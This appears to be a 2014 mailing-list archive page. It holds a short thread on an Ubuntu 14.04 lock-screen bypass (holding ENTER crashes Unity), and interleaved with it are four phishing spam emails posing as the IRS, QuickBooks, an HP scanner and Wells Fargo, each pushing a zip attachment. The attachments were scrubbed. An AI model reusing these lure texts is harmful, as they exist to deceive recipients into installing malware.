Tue Apr 29 06:30:51 2014 From: guninski at guninski.com (Georgi Guninski) Date: Tue, 29 Apr 2014 16:30:51 +0300 Subject: Ubuntu bug 1308572 Message-ID: <20140429133051.GA17929@sivokote.iziade.m$> Ubuntu bug 1308572 https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572 ----- affects ubuntu Hello, I am running Ubuntu 14.04 with all the packages updated. When the screen is locked with password, if I hold ENTER after some seconds the screen freezes and the lock screen crashes. After that I have the computer fully unlocked. -- Marco Agnese This bug is about the lockscreen being bypassed when unity crashes/restarts, which is a critcal security issue. The crash will be handled from bug 1308750 ----- From TaxPro_PTIN at static-ip-77-89-126-88.promax.media.pl Wed Apr 30 05:16:02 2014 From: TaxPro_PTIN at static-ip-77-89-126-88.promax.media.pl (TaxPro_PTIN@irs.gov) Date: Wed, 30 Apr 2014 13:16:02 +0100 Subject: Your FED TAX payment ( ID : KGPIRS594044264 ) was Rejected Message-ID: <7.607070@static-ip-77-89-126-88.promax.media.pl> *** PLEASE DO NOT RESPOND TO THIS EMAIL *** Your federal Tax payment (ID: KGPIRS594044264), recently sent from your checking account was returned by the your financial institution.For more information, please download attached notification. (Security PDF Adobe file) Transaction Number: KGPIRS594044264 Payment Amount: $ 8520.00 Transaction status: Rejected ACH Trace Number: 843581148679615 Transaction Type: ACH Debit Payment-DDA Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2376 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: FED TAX Payment.zip Type: application/zip Size: 7086 bytes Desc: not available URL: From auto-invoice at quickbooks.com Wed Apr 30 05:50:40 2014 From: auto-invoice at quickbooks.com (QuickBooks Invoice) Date: Wed, 30 Apr 2014 13:50:40 +0100 Subject: Payment Overdue Message-ID: Please find attached your invoices for the past months. Remit the payment by 03/23/2014 as outlines under our "Payment Terms" agreement. Thank you for your business, Sincerely, Alicia Villanueva This e-mail has been sent from an automated system. PLEASE DO NOT REPLY. The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you. -------------- next part -------------- A non-text attachment was scrubbed... Name: invoice_04302014.zip Type: application/zip Size: 7052 bytes Desc: not available URL: From HP_Printer at jfet.org Wed Apr 30 08:02:00 2014 From: HP_Printer at jfet.org (HP Digital Device) Date: Wed, 30 Apr 2014 16:02:00 +0100 Subject: Scanned Image from a HP Digital Device Message-ID: Please open the attached document. This document was digitally sent to you using an HP Digital Sending device. ------------------------------------------------------------------------------- This email has been scanned for viruses and spam. ------------------------------------------------------------------------------- -------------- next part -------------- A non-text attachment was scrubbed... Name: Image-195383.zip Type: application/zip Size: 7080 bytes Desc: not available URL: From alerts at cable-24-135-134-39.dynamic.sbb.rs Wed Apr 30 12:37:43 2014 From: alerts at cable-24-135-134-39.dynamic.sbb.rs (Wells Fargo Advisors) Date: Wed, 30 Apr 2014 20:37:43 +0100 Subject: Wells Fargo Advisors Online Documents Activated Message-ID: <7.502020@cable-24-135-134-39.dynamic.sbb.rs> Secure Email by Wells Fargo Advisors a {color: #338ac1 !important; text-decoration: none !important;} a:hover { text-decoration: none !important; } /* Media Queries ***********************/ @media only screen and (max-device-width: 550px) { body {-webkit-text-size-adjust: none;} table[class="wrapper"] {background: none!important; width: 100%!important; margin: 0!important;padding: 0!important;} td[class="inner-wrapper"] {padding: 0 !important;} table[class="footer"] {background: none!important; width: 100%!important; margin: 0!important;} table[class="footer-inner"] {background: none!important; width: 100%!important; margin: 0!important; -webkit-border-radius: 0!important; -moz-border-radius: 0!important; -o-border-radius: 0!important; border-radius: 0!important;} table[class="header"] {width: 100%!important; margin: 0!important;-webkit-border-radius: 0!important; -moz-border-radius: 0!important; -o-border-radius: 0!important; border-radius: 0!important;} img[class="logo"] {max-width: 400px!important; height: auto; -ms-interpolation-mode: bicubic;} table[class="box"] {width: auto !important; margin: 0 10px !important;} table[class="box"] h2 {font-size: 16px !important;} td[class="icon"] {display} td[class="main-message"] h2 { margin: 0 !important; text-align: left!important;} td[class="copyright"] {padding: 15px 0 !important;} td[class="instruction"] {padding: 0 0 12px !important; background: none !important;} td[class="mail"] {width: auto!important; float: left!important;} td[class="tops"] h2 {padding: 15px 0 12px !important;} table[class="main"] { border:0 !important;} table[class="footer-inner"] { border:0 !important;} td[class="personal"] {width: auto!important; float: left!important;padding-right: 5px!important;} } @media screen and (max-device-width: 525px) { img[class="logo"] { max-width: 375px!important; height: auto; -ms-interpolation-mode: bicubic;} } @media screen and (max-device-width: 500px) { img[class="logo"] { max-width: 350px!important; height: auto; -ms-interpolation-mode: bicubic;} } @media screen and (max-device-width: 475px) { img[class="logo"] { max-width: 325px!important; height: auto; -ms-interpolation-mode: bicubic;} } @media screen and (max-device-width: 450px) { img[class="logo"] { max-width: 300px!important; height: auto; -ms-interpolation-mode: bicubic;} } @media screen and (max-device-width: 425px) { img[class="logo"] { max-width: 290px!important; height: auto; -ms-interpolation-mode: bicubic;} } @media screen and (max-device-width: 400px) { img[class="logo"] { max-width: 250px!important; height: auto; -ms-interpolation-mode: bicubic;} } Secure Email from Wells Fargo Advisors To Read This Message: Look for and open Message.zip (typically at the top or bottom; location varies by email service). Need help? Support information , Video tutorial or call the support line at 1.877.879.2495, option 3. Your email: cypherpunks at jfet.org ATTENTION: THIS E-MAIL MAY BE AN ADVERTISEMENT OR SOLICITATION FOR PRODUCTS AND SERVICES.To unsubscribe from marketing e-mails from an individual Wells Fargo Advisors financial advisor, reply to one of his/her e-mails and type 'Unsubscribe' in the subject line. To unsubscribe from marketing emails from Wells Fargo and its affiliates, unsubscribe atwww.wellsfargoadvisors.com/unsubscribe. Neither of these actions will affect delivery of important service messages regarding your accounts that we may need to send you or preferences you may have previously set for other e-mail services. For additional information regarding our electronic communication policies, visit: http://wellsfargoadvisors.com/disclosures/email-disclosure.html Investments in securities and insurance products are: NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE Investment professionals are registered representatives of Wells Fargo Advisors, LLC, a registered broker dealer and a separate non-bank affiliate of Wells Fargo & Company. Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103. Email Security Powered by Voltage IBE Copyright 2013 Wells Fargo. All rights reserved -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 15190 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: Message.zip Type: application/zip Size: 7092 bytes Desc: not available URL: From guninski at guninski.com Wed Apr 30 10:46:27 2014 From: guninski at guninski.com (Georgi Guninski) Date: Wed, 30 Apr 2014 20:46:27 +0300 Subject: Ubuntu bug 1308572 In-Reply-To: References: <20140429133051.GA17929@sivokote.iziade.m$> Message-ID: <20140430174627.GB2494@sivokote.iziade.m$> On Tue, Apr 29, 2014 at 01:35:54PM -0400, Eric Mill wrote: > On Tue, Apr 29, 2014 at 9:30 AM, Georgi Guninski wrote: > > Ubuntu bug 1308572 > > > > https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572 > > > > ----- > > affects ubuntu > > > > Hello, > > I am running Ubuntu 14.04 with all the packages updated. > > When the screen is locked with password, if I hold ENTER after some > > seconds the screen freezes and the lock screen crashes. After that I > > have the computer fully unlocked. > > Fortunately, the final comment says: > > "Just a sidenote: Unlike what the sensationalist article at heise.de > from today suggests (which links here), this bug was fixed in a heroc > effort over night *before* final release, the fix is on the 14.04 > image that was released to end users." > > Dude, I don't trust ubuntu but don't like spamming about 10^8 critical bugs which I suspect will appear in the future. Watch their advisories page, having in mind ``multiple'' usually means ``quite a lot''. Also check the thread about gcc bugs.